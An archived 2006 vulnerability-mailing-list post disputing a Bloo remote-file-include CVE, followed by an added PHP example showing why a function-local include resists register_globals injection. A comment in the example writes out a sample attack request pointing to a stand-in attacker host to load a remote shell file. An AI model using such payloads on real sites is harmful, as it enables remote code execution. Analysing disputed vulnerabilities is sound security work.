[VIM] CVE dispute for Bloo RFI

Steven M. Christey coley at mitre.org
Tue Nov 21 17:31:53 EST 2006


Researcher: the_Edit0r
Ref: BUGTRAQ:20061116 Bloo => 1.00 Remote File Include Vulnerability
     http://www.securityfocus.com/archive/1/archive/1/451818/100/0/threaded


># CodE :
>include( $descriptorFileList );


In a diff of phoo.base.php (as of 20061110 back to March 2006):

  http://bloo.cvs.sourceforge.net/bloo/bloo/phoo.base.php?r1=1.1&r2=1.30.2.6

we see that there's no "include( $descriptorFileList );" but, in fact:

  @include( $descriptorFileList[ 0 ] );

  include( $descriptorFileList[ 0 ] );

and similar statements.

So, first of all, the claimed code doesn't appear to exist, at least
not in recent versions.

Second, phoo.base.php (as of 20061110) is laid out as:

  class PhooSession extends PhooBase {
  
    ...
  
     function loadThemes( $themeRoot, $virtualThemeLoadCommand = null ) {
  
    ...
  
                    /* read the theme descriptor */
                    include( $descriptorFileList[ 0 ] );

So, we have a variable use within a function definition.

For the version dating back to March 2006, we have:

  function verifyTheme( $themeRoot, $theme ) {
  
    ...
  
    @include( $descriptorFileList[ 0 ] );

and

  function loadTheme( $themeRoot, $theme ) {
  
    ...
  
      @include( $descriptorFileList[ 0 ] );


So, at best, the original report is incorrect for recent versions of
Bloo.


- Steve
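The scope point above (the include the advisory quoted at global scope versus the include the CVS diff shows inside a function) is the crux of the dispute. The following is an added illustration, not code from Bloo or from the advisory: it contrasts the two patterns and demonstrates why a register_globals-style remote file include needs the included variable to be reachable from the request. How Bloo actually populates `$descriptorFileList` is not established by the post; the `glob()` over a `theme.php` descriptor file, the `loadThemes()` signature and the temporary theme tree are assumptions made for this example.

```php
<?php
// Added example, not Bloo's code. It contrasts the include the advisory
// quoted (a bare global variable) with the one the CVS diff shows (a
// function-local variable) and shows why the distinction matters for a
// register_globals-style remote file include.

// Pattern A, as the advisory claimed:   include( $descriptorFileList );
// at global scope. With register_globals=On, a request such as
//   ?descriptorFileList=http://attacker.example/shell.txt
// creates $descriptorFileList in the global symbol table before the include
// runs, so the include fetches and executes remote code. Deliberately not
// executed in this script.

// Pattern B, as seen in the diff: the include sits inside a function and the
// variable is a local of that function. register_globals populates only the
// global symbol table, so the request parameter never reaches the local
// unless the function itself copies it from $_GET/$_REQUEST or declares it
// global. How Bloo builds the list is an assumption here: a glob() over the
// theme directories for a descriptor file named theme.php.
function loadThemes( $themeRoot ) {
    $descriptorFileList = glob( rtrim( $themeRoot, '/' ) . '/*/theme.php' );
    if ( empty( $descriptorFileList ) ) {
        return null;
    }
    /* read the theme descriptor */
    // include() returns whatever the included file returns, which lets the
    // caller see which file was actually read.
    return include( $descriptorFileList[ 0 ] );
}

// Self-check: simulate register_globals by setting the global with an
// attacker-style value, then call the function against a constructed theme
// tree and confirm the local, not the global, is what gets included.
$descriptorFileList = 'http://attacker.example/shell.txt';

$root = sys_get_temp_dir() . '/bloo-example-' . getmypid();
mkdir( $root . '/default', 0700, true );
file_put_contents( $root . '/default/theme.php',
                   "<?php return 'local descriptor';" );

// Value returned by the descriptor file that loadThemes() found on disk.
var_dump( loadThemes( $root ) );
// The global set above is untouched and was never passed to include().
var_dump( $descriptorFileList );

unlink( $root . '/default/theme.php' );
rmdir( $root . '/default' );
rmdir( $root );
```

What the example does not settle, and what the post leaves open, is how the function's own arguments (here `$themeRoot`) are derived: if a caller passed request data into them, the directory part of the path would still be attacker-influenced, even though the bare `include( $descriptorFileList )` the advisory quoted does not appear in the code.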

